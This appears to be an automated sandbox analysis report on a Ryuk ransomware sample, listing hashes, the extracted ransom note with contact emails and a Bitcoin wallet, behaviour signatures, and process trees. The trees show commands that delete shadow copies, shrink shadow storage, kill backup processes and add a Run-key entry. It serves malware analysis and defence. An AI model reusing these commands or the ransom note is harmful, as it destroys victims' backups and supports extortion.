ryuk | 98ece6bcafa296326654db862140520afc19cfa0b4a76a5950deedb2618097ab

Resubmissions

25-08-2021 09:58

210825-v7zzyl2nr6 10

27-04-2021 14:41

210427-xtq2b4mr86 10

Analysis

max time kernel
679s
max time network
681s
platform
windows7_x64
resource
win7v20210410
submitted
25-08-2021 09:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

red-necessary.exe
Size

171KB
MD5

8819d7f8069d35e71902025d801b44dd
SHA1

5af393e60df1140193ad172a917508e9682918ab
SHA256

98ece6bcafa296326654db862140520afc19cfa0b4a76a5950deedb2618097ab
SHA512

41ada66895e76a0ba3cf1feea4b9cb4c76d2df1b801c44a1d333cdb8c737001ab9dcc9ef35ba8f1a87d329aa23eeca0729b2279e1955d6657172a3593627cbb2

Score

10^/10

ryuk persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 17v2cu8RDXhAxufQ1YKiauBq6GGAZzfnFw Ryuk No system is safe

Emails

[email protected]

Wallets

17v2cu8RDXhAxufQ1YKiauBq6GGAZzfnFw

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Dwm.exetaskhost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\MeasureUpdate.tiff	Dwm.exe
File opened for modification	C:\Users\Admin\Pictures\UndoRead.tiff	Dwm.exe
File opened for modification	C:\Users\Admin\Pictures\ExportReceive.tiff	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\MeasureUpdate.tiff	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\UndoRead.tiff	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\ExportReceive.tiff	Dwm.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\red-necessary.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates connected drives 3 TTPs 36 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

Dwm.exetaskhost.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\validation.js	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199805.WMF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107152.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\MMSL.ICO	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\HORN.WAV	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\3082\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF	Dwm.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrusash.dat	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL_K_COL.HXK	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Flow.thmx	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR17F.GIF	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CRANINST.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099174.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10O.CHM	taskhost.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08773_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN095.XML	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF	taskhost.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PG_INDEX.XML	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp	taskhost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21302_.GIF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE01160_.WMF	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanMergeLetter.Dotx	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar	taskhost.exe
File opened for modification	C:\Program Files\Reference Assemblies\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.htm	taskhost.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\MSB1AR.LEX	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199755.WMF	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Easter	Dwm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 28 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

pid	process
4492	vssadmin.exe
4164	vssadmin.exe
3860	vssadmin.exe
4216	vssadmin.exe
1664	vssadmin.exe
2520	vssadmin.exe
3888	vssadmin.exe
2656	vssadmin.exe
3960	vssadmin.exe
3992	vssadmin.exe
3436	vssadmin.exe
4320	vssadmin.exe
3748	vssadmin.exe
3852	vssadmin.exe
5012	vssadmin.exe
2484	vssadmin.exe
2872	vssadmin.exe
592	vssadmin.exe
1140	vssadmin.exe
1624	vssadmin.exe
4644	vssadmin.exe
2948	vssadmin.exe
4880	vssadmin.exe
3284	vssadmin.exe
4260	vssadmin.exe
4804	vssadmin.exe
4020	vssadmin.exe
1652	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2280	taskkill.exe
2384	taskkill.exe
2620	taskkill.exe
2812	taskkill.exe
2424	taskkill.exe
2696	taskkill.exe
1364	taskkill.exe
2208	taskkill.exe
2972	taskkill.exe
2472	taskkill.exe
1608	taskkill.exe
2184	taskkill.exe
2164	taskkill.exe
3356	taskkill.exe
3524	taskkill.exe
396	taskkill.exe
992	taskkill.exe
2888	taskkill.exe
320	taskkill.exe
2108	taskkill.exe
2684	taskkill.exe
2984	taskkill.exe
2440	taskkill.exe
2940	taskkill.exe
3188	taskkill.exe
3240	taskkill.exe
660	taskkill.exe
2520	taskkill.exe
3416	taskkill.exe
3492	taskkill.exe
2952	taskkill.exe
3140	taskkill.exe
568	taskkill.exe
2440	taskkill.exe
1540	taskkill.exe
1952	taskkill.exe
1552	taskkill.exe
1756	taskkill.exe
2148	taskkill.exe
3020	taskkill.exe
2152	taskkill.exe
3292	taskkill.exe
1144	taskkill.exe
788	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

red-necessary.exe

pid	process
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe
308	red-necessary.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

red-necessary.exe

pid process

308 red-necessary.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2148	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2952	taskkill.exe
Token: SeDebugPrivilege	2696	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3292	taskkill.exe
Token: SeDebugPrivilege	3240	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	308	red-necessary.exe
Token: SeBackupPrivilege	4204	vssvc.exe
Token: SeRestorePrivilege	4204	vssvc.exe
Token: SeAuditPrivilege	4204	vssvc.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

taskhost.exeDwm.exe

pid process

1132 taskhost.exe
1208 Dwm.exe

pid	process
1132	taskhost.exe
1208	Dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

red-necessary.exe

description	pid	process	target process
PID 308 wrote to memory of 1364	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1364	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1364	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1144	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1144	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1144	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1540	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1540	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1540	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 788	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 788	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 788	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 396	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 396	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 396	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 568	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 568	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 568	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 320	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 320	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 320	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1552	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1552	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1552	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 992	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 992	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 992	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1952	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1952	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1952	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1608	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1608	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1608	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 660	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 660	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 660	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1756	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1756	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 1756	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2108	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2108	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2108	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2148	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2148	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2148	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2208	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2208	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2208	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2280	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2280	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2280	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2384	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2384	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2384	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2440	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2440	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2440	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2472	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2472	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2472	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2520	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2520	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2520	308	red-necessary.exe	taskkill.exe
PID 308 wrote to memory of 2620	308	red-necessary.exe	taskkill.exe

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:3720

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5012

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:4644

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4164

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2484

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3992

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1140

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1664

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2872

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2656

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:592

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1652

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2948

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2520

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1624

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
2⤵
PID:4888

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3888

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:3860

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:3436

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4020

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4260

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4804

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4320

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4880

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3284

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4216

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3748

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3960

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3852

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4492

C:\Users\Admin\AppData\Local\Temp\red-necessary.exe
"C:\Users\Admin\AppData\Local\Temp\red-necessary.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
2⤵
